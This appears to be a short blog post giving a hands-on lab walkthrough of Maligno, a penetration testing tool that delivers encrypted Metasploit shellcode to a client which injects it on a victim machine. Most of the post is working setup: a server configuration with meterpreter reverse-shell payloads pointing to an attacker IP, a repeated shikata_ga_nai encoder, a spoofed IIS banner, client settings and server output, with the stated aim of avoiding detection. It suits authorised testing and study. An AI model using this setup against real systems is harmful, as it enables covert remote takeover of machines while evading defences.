«

»

May 30

Maligno (Metasploit Payload Server) – Hands On

I stumbled across Maligno on SecurityTube there’s a good video:

http://www.securitytube.net/video/7639

Maligno is an open source penetration testing tool that from Encripto (www.encripto.no) that serves Metasploit payloads.

The only negative I can see with it are that Python needs to be installed on the victim along with Pycrypto (which may be present on *nix targets but is not part of Python 2.7 for Windows).

Maligno is available for download here:

http://www.encripto.no/tools/maligno-0.6.tar.gz

What is it? [From the Maligno README]

It generates shellcode with msfvenom and transmits it over HTTP or HTTPS.

The shellcode is encrypted with AES and encoded with Base64 prior to transmission.

Maligno comes with a client tool, which is a modified version of David Kennedy’s PyInjector. Such modified client implements HTTP, HTTPS and encryption capabilities.

The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

As a result, you should get your Metasploit session while avoiding detection.

Hands On

My Lab setup:

Attacker: 172.0.0.10

Victim: 10.10.0.3

First Use:

You must create an SSL certificate in order to set up Maligno with HTTPS.

certgen.sh will do the job for you.

./certgen.sh

Usage:

Make the appropriate changes to server.conf:

[Metasploit]

msfpath = /opt/metasploit/app/

msfpayload = windows/meterpreter/reverse_https, windows/meterpreter/reverse_tcp, windows/meterpreter/reverse_http

msflhost = 172.0.0.10

msflport = 4444

msfencoder = x86/shikata_ga_nai

msfiterations = 10

msfcache = true

msfcachefile = msfcache

[Encryption]

base64rounds = 1

blocksize = 32

paddingchar = !

secret = cedbd5af520bdab20c3b79d521d8b1c8

[Scope]

scope = 10.10.0.0/24

[Server]

srvport = 443

ssl = true

sslcert = ./certs/server.pem

banner = Microsoft-IIS/7.5

reqparam = id

Upload maligno_client.py and make appropriate changes to maligno_client.py i.e.:

# IP address and port where Maligno server is waiting for connections

server_addr = “172.0.0.10”

server_port = “443”

Starting Maligno Server:

# ./maligno_srv.py

=================================================================

| Maligno v0.6: A Metasploit payload server |

| by Juan J. Guelfo, Encripto AS (post@encripto.no) |

=================================================================

[*] Starting Maligno…

[*] Reading server configuration…

[*] SSL certificate file found. SSL enabled…

[*] Maligno is up and running. Press CTRL+C to stop…

Maligno Client Dependencies:

Python (Tested with 2.7 on Windows XP)

and

pycrypto (http://www.voidspace.org.uk/python/modules.shtml#pycrypto)

Tested with http://www.voidspace.org.uk/downloads/pycrypto26/pycrypto-2.6.win32-py2.7.exe

Running Maligno Server:

CTRL-C Maligno server as soon as…

[+] Package sent!

[*] End of request

…is received.

Victim (Maligno Client):

Meterpreter session doesn’t seem to start until you CTRL-C the Maligno Server (which has done it’s job anyway!)

Handler:

: )

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>